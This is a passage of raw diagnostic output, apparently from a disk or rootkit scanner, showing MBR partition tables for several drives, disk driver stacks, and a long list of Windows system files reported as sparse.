    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 1000204886016 bytes
    Sector size: 512 bytes

    Done!
    Drive 1
    This is a System drive
    Scanning MBR on drive 1...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 4B95E549

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 206848 Numsec = 234232752
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 120034123776 bytes
    Sector size: 512 bytes

    Done!
    Physical Sector Size: 512
    Drive: 2, DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe00020a38b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe00020a07b10, DeviceName: \Device\00000041\, DriverName: \Driver\USBSTOR\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    Drive 2
    Scanning MBR on drive 2...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 908BDE7D

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048 Numsec = 3907027116
    Partition is not bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 2000398933504 bytes
    Sector size: 512 bytes

    Done!
    Physical Sector Size: 0
    Drive: 3, DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe00021920b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe000209bfb10, DeviceName: \Device\00000047\, DriverName: \Driver\USBSTOR\
    ------------ End ----------
    File "C:\WINDOWS\System32\KERNELBASE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\KERNELBASE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\apphelp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\psapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\user32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\gdi32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\advapi32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msvcrt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sechost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rpcrt4.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sspicli.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\CRYPTBASE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BCRYPTPRIMITIVES.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\imm32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msctf.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shlwapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\combase.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shell32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STORAGE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\version.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\KERNEL.APPCORE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SHCore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\powrprof.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\profapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ole32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wintrust.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msasn1.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\crypt32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\imagehlp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\comdlg32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wininet.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\oleaut32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netapi32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ws2_32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nsi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\userenv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mpr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winmm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winspool.drv" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wkscli.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\srvcli.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netutils.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINMMBASE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cfgmgr32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bcrypt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sfc_os.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\devobj.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptsp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rsaenh.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cscapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\uxtheme.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\iertutil.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ONDEMANDCONNROUTEHELPER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IPHLPAPI.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winnsi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winhttp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mswsock.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dnsapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\urlmon.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasadhlp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FWPUCLNT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dwmapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dhcpcsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ntmarta.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\clbcatq.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wtsapi32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winsta.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\propsys.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mssprxy.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\smss.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\csrss.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wininit.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winlogon.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\services.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lsass.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\svchost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dwm.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WUDFHost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\WmiPrvSE.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wsock32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\setupapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasapi32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasman.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dpapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wscisvif.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wscapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ReAgent.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wdscore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DismApi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\wbemdisp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbemcomn.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sxs.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\wbemsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\fastprox.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\secur32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DHCPCSVC6.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nlaapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nlaapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NapiNSP.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pnrpnsp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winrnr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\fltLib.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlanapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlanapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netshell.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\webio.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\samcli.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\schannel.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSKEYPROTECT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ntasn1.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ncrypt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NCRYPTSSLP.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\gpapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptnet.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Wldap32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BITSPROXY.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\spoolsv.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\httpapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mqsvc.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shfolder.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\oleacc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msimg32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\oledlg.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\jsproxy.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\jsproxy.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wshqos.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WSHTCPIP.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wship6.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\hid.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cabinet.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mscoree.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSVCR120_CLR0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\mscorlib\68b0897c4cade2a6a72889bff2bd0904\MSCORLIB.NI.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\clrjit.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\System\141950bbb0b97c04e39b8c1097eb38b4\System.ni.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dbghelp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dbgcore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSVCHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sihost.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PRESENTATIONFONTCACHE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\explorer.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TASKHOSTW.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RUNTIMEBROKER.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\SHELLEXPERIENCEHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SEARCHINDEXER.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\usp10.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\credui.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pdh.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ntdsapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DWrite.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AudioSes.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WinTypes.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MMDevAPI.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Wpc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSVCP_WIN.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ucrtbase.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIRECTMANIPULATION.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DATAEXCHANGE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\d2d1.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\d3d11.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dcomp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dxgi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TWINAPI.APPCORE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\EXPLORERFRAME.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bthprops.cpl" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BLUETOOTHAPIS.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mscms.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\linkinfo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STORAGE.SEARCH.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\edputil.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\POLICYMANAGER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSVCP110_WIN.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\xmllite.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ntshrui.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\samlib.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\twinapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\actxprxy.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\devenum.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msdmo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Speech\Common\sapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msacm32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\avrt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\coml2.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWSCODECS.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\THUMBCACHE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shdocvw.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mfplat.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RTWorkQ.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MSMPEG2VDEC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MFPERFHELPER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msvproc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\D3DCOMPILER_47.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\d3d9.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dxva2.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mf.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mfcore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ksuser.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\snmpapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetmib1.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptui.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\wbemprox.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dsparse.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dsound.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\UIAUTOMATIONCORE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\atlthunk.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FONTDRVHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\unsecapp.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFGFX_V0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\PRESENTATIONNATIVE_V0400.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\MSCORSECIMPL.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\wmiutils.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WMINET_UTILS.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rtutils.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msctfui.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DLNASHEXT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEVDISPITEMPROVIDER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wpdshext.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msiltcfg.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\opengl32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\glu32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ddraw.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dciman32.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\winusb.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\hhctrl.ocx" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\srclient.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\spp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vssapi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vsstrace.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msxml6.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\AppPatch\AcLayers.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\DIASYMREADER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msv1_0.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NTLMSHARED.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptdll.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\INSTALLAGENT.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPLICATIONFRAMEHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SEARCHPROTOCOLHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\audiodg.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SEARCHFILTERHOST.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\SysWOW64\ONEDRIVESETUP.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\credssp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\userinit.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\scecli.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\kerberos.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wdigest.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TSpkg.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pku2u.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\1394ohci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\flpydisk.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mspclock.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\acpiex.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\acpi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\isapnp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\acpipmi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Locator.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\amdk8.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\acpipagr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\acpitime.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\luafv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mpsdrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\afd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\asyncmac.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\srv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\AGP440.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sdstor.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ahcache.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\alg.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BASICRENDER.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\amdppm.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\umpass.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\appid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rspndr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\irenum.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ioqos.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\ASPNET_STATE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\srv2.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\atapi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BASICDISPLAY.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pciide.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\bowser.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BTHAVRCPTG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BTHHFENUM.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\BthhfHid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\bthmodem.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\volmgr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\udfs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\uefi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\cdfs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\clfs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\cdrom.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\circlass.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\mup.sys" is sparse (flags = 32768)
